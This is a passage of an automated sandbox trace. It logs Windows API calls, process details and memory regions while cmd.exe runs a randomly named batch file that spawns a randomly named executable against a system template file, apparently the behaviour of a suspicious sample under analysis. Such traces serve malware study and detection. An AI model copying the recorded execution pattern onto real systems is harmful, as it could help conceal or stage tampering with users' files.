lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xe3f698*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xe3f6e4 | out: lpCommandLine="vIDhS3md.exe -accepteula \"WinMail.exe.mui\" -nobanner", lpProcessInformation=0xe3f6e4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0x904, dwThreadId=0xe98)) returned 1 [0284.919] CloseHandle (hObject=0xa4) returned 1 [0284.919] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0284.919] GetEnvironmentStringsW () returned 0x1168180* [0284.919] FreeEnvironmentStringsA (penv="=") returned 1 [0284.919] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0293.079] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0xe3f67c | out: lpExitCode=0xe3f67c*=0x0) returned 1 [0293.079] CloseHandle (hObject=0xa8) returned 1 [0293.079] _vsnwprintf (in: _Buffer=0xe3f764, _BufferCount=0x13, _Format="%08X", _ArgList=0xe3f684 | out: _Buffer="00000000") returned 8 [0293.079] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0293.079] GetEnvironmentStringsW () returned 0x1168180* [0293.079] FreeEnvironmentStringsA (penv="=") returned 1 [0293.079] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0293.080] GetEnvironmentStringsW () returned 0x1168180* [0293.080] FreeEnvironmentStringsA (penv="=") returned 1 [0293.080] DeleteProcThreadAttributeList (in: lpAttributeList=0xe3f710 | out: lpAttributeList=0xe3f710) [0293.080] _get_osfhandle (_FileHandle=1) returned 0xc0 [0293.080] SetConsoleMode (hConsoleHandle=0xc0, dwMode=0x0) returned 0 [0293.080] _get_osfhandle (_FileHandle=1) returned 0xc0 [0293.080] GetConsoleMode (in: hConsoleHandle=0xc0, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 0 [0293.080] _get_osfhandle (_FileHandle=0) returned 0x38 [0293.080] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0293.174] SetConsoleInputExeNameW () returned 0x1 [0293.174] GetConsoleOutputCP () returned 0x1b5 [0293.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0293.174] SetThreadUILanguage (LangId=0x0) returned 0x409 [0293.174] exit (_Code=0) Thread: id = 934 os_tid = 0x994 Process: id = "118" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xd97000" os_pid = "0x5c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8419 start_va = 0x850000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 8420 start_va = 0x870000 end_va = 0x871fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 8421 start_va = 0x880000 end_va = 0x893fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 8422 start_va = 0x8a0000 end_va = 0x8dffff entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 8423 start_va = 0x8e0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 8424 start_va = 0x9e0000 end_va = 0x9e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 8425 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8426 start_va = 0x1420000 end_va = 0x541ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001420000" filename = "" Region: id = 8427 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8428 start_va = 0x7f740000 end_va = 0x7f762fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f740000" filename = "" Region: id = 8429 start_va = 0x7f769000 end_va = 0x7f769fff entry_point = 0x0 region_type = private name = "private_0x000000007f769000" filename = "" Region: id = 8430 start_va = 0x7f76c000 end_va = 0x7f76efff entry_point = 0x0 region_type = private name = "private_0x000000007f76c000" filename = "" Region: id = 8431 start_va = 0x7f76f000 end_va = 0x7f76ffff entry_point = 0x0 region_type = private name = "private_0x000000007f76f000" filename = "" Region: id = 8432 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8433 start_va = 0x7fff0000 end_va = 0x7dfaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8434 start_va = 0x7dfaf7a10000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfaf7a10000" filename = "" Region: id = 8435 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8436 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 8437 start_va = 0x9f0000 end_va = 0x9f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 8438 start_va = 0xa00000 end_va = 0xa01fff entry_point = 0x0 region_type = private name = "private_0x0000000000a00000" filename = "" Region: id = 8443 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 8444 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8445 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8446 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8447 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8448 start_va = 0xac0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 8449 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8450 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8451 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 8452 start_va = 0x7f640000 end_va = 0x7f73ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f640000" filename = "" Region: id = 8571 start_va = 0xac0000 end_va = 0xb7dfff entry_point = 0xac0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8572 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 8573 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8574 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 8575 start_va = 0xb80000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 8576 start_va = 0xdb0000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000db0000" filename = "" Region: id = 8577 start_va = 0x7f766000 end_va = 0x7f768fff entry_point = 0x0 region_type = private name = "private_0x000000007f766000" filename = "" Region: id = 8578 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 8630 start_va = 0x870000 end_va = 0x873fff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 8839 start_va = 0x74540000 end_va = 0x74547fff entry_point = 0x74540000 region_type = mapped_file name = "cmdext.dll" filename = "\\Windows\\SysWOW64\\cmdext.dll" (normalized: "c:\\windows\\syswow64\\cmdext.dll") Region: id = 8840 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 8841 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8842 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8843 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8844 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8845 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8846 start_va = 0xa50000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 9113 start_va = 0xec0000 end_va = 0x11f6fff entry_point = 0xec0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 929 os_tid = 0x92c [0284.894] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0284.894] __set_app_type (_Type=0x1) [0284.894] __p__fmode () returned 0x77984d6c [0284.894] __p__commode () returned 0x77985b1c [0284.894] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0284.894] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0284.894] GetCurrentThreadId () returned 0x92c [0284.894] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x92c) returned 0x84 [0284.894] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0284.894] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0284.894] SetThreadUILanguage (LangId=0x0) returned 0x409 [0284.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0284.954] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x9dfbc8 | out: phkResult=0x9dfbc8*=0x0) returned 0x2 [0284.954] VirtualQuery (in: lpAddress=0x9dfbcf, lpBuffer=0x9dfb80, dwLength=0x1c | out: lpBuffer=0x9dfb80*(BaseAddress=0x9df000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0284.954] VirtualQuery (in: lpAddress=0x8e0000, lpBuffer=0x9dfb80, dwLength=0x1c | out: lpBuffer=0x9dfb80*(BaseAddress=0x8e0000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0284.954] VirtualQuery (in: lpAddress=0x8e1000, lpBuffer=0x9dfb80, dwLength=0x1c | out: lpBuffer=0x9dfb80*(BaseAddress=0x8e1000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0284.954] VirtualQuery (in: lpAddress=0x8e3000, lpBuffer=0x9dfb80, dwLength=0x1c | out: lpBuffer=0x9dfb80*(BaseAddress=0x8e3000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0284.954] VirtualQuery (in: lpAddress=0x9e0000, lpBuffer=0x9dfb80, dwLength=0x1c | out: lpBuffer=0x9dfb80*(BaseAddress=0x9e0000, AllocationBase=0x9e0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0284.954] GetConsoleOutputCP () returned 0x1b5 [0284.959] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0284.959] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0284.959] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.959] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0284.972] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.972] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0284.985] _get_osfhandle (_FileHandle=1) returned 0x3c [0284.985] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0284.988] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.988] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0284.991] _get_osfhandle (_FileHandle=0) returned 0x38 [0284.991] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0285.151] GetEnvironmentStringsW () returned 0xcb7ea0* [0285.154] FreeEnvironmentStringsA (penv="A") returned 1 [0285.154] GetEnvironmentStringsW () returned 0xcb7ea0* [0285.154] FreeEnvironmentStringsA (penv="A") returned 1 [0285.154] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9deb2c | out: phkResult=0x9deb2c*=0x94) returned 0x0 [0285.154] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x0, lpData=0x9deb38*=0xd8, lpcbData=0x9deb34*=0x1000) returned 0x2 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x1, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x0, lpData=0x9deb38*=0x1, lpcbData=0x9deb34*=0x1000) returned 0x2 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x0, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x40, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x40, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x0, lpData=0x9deb38*=0x40, lpcbData=0x9deb34*=0x1000) returned 0x2 [0285.155] RegCloseKey (hKey=0x94) returned 0x0 [0285.155] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x9deb2c | out: phkResult=0x9deb2c*=0x94) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x0, lpData=0x9deb38*=0x40, lpcbData=0x9deb34*=0x1000) returned 0x2 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x1, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x0, lpData=0x9deb38*=0x1, lpcbData=0x9deb34*=0x1000) returned 0x2 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x0, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x9, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.155] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x4, lpData=0x9deb38*=0x9, lpcbData=0x9deb34*=0x4) returned 0x0 [0285.156] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x9deb30, lpData=0x9deb38, lpcbData=0x9deb34*=0x1000 | out: lpType=0x9deb30*=0x0, lpData=0x9deb38*=0x9, lpcbData=0x9deb34*=0x1000) returned 0x2 [0285.156] RegCloseKey (hKey=0x94) returned 0x0 [0285.156] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb432a5 [0285.156] srand (_Seed=0x5bb432a5) [0285.156] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"\"" [0285.156] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"\"" [0285.156] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0285.156] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcb7ea8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0285.156] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0285.156] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0285.156] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0285.156] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0285.156] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0285.156] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0285.156] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0285.156] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0285.156] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0285.156] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0285.156] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0285.208] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0285.208] GetEnvironmentStringsW () returned 0xcb80b8* [0285.208] FreeEnvironmentStringsA (penv="A") returned 1 [0285.208] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0285.208] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0285.208] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0285.208] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0285.208] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0285.208] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0285.208] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0285.208] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0285.208] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0285.208] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0285.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x9df904 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0285.208] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x9df904, lpFilePart=0x9df8fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9df8fc*="Desktop") returned 0x1d [0285.208] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0285.208] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x9df680 | out: lpFindFileData=0x9df680) returned 0xcb05c8 [0285.209] FindClose (in: hFindFile=0xcb05c8 | out: hFindFile=0xcb05c8) returned 1 [0285.209] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x9df680 | out: lpFindFileData=0x9df680) returned 0xcb05c8 [0285.209] FindClose (in: hFindFile=0xcb05c8 | out: hFindFile=0xcb05c8) returned 1 [0285.209] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0285.209] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x9df680 | out: lpFindFileData=0x9df680) returned 0xcb05c8 [0285.209] FindClose (in: hFindFile=0xcb05c8 | out: hFindFile=0xcb05c8) returned 1 [0285.209] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0285.209] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0285.209] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0285.209] GetEnvironmentStringsW () returned 0xcb80b8* [0285.209] FreeEnvironmentStringsA (penv="=") returned 1 [0285.209] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0285.210] GetConsoleOutputCP () returned 0x1b5 [0285.356] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0285.356] GetUserDefaultLCID () returned 0x409 [0285.356] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0285.356] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x9dfa34, cchData=128 | out: lpLCData="0") returned 2 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x9dfa34, cchData=128 | out: lpLCData="0") returned 2 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x9dfa34, cchData=128 | out: lpLCData="1") returned 2 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0285.357] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0285.357] 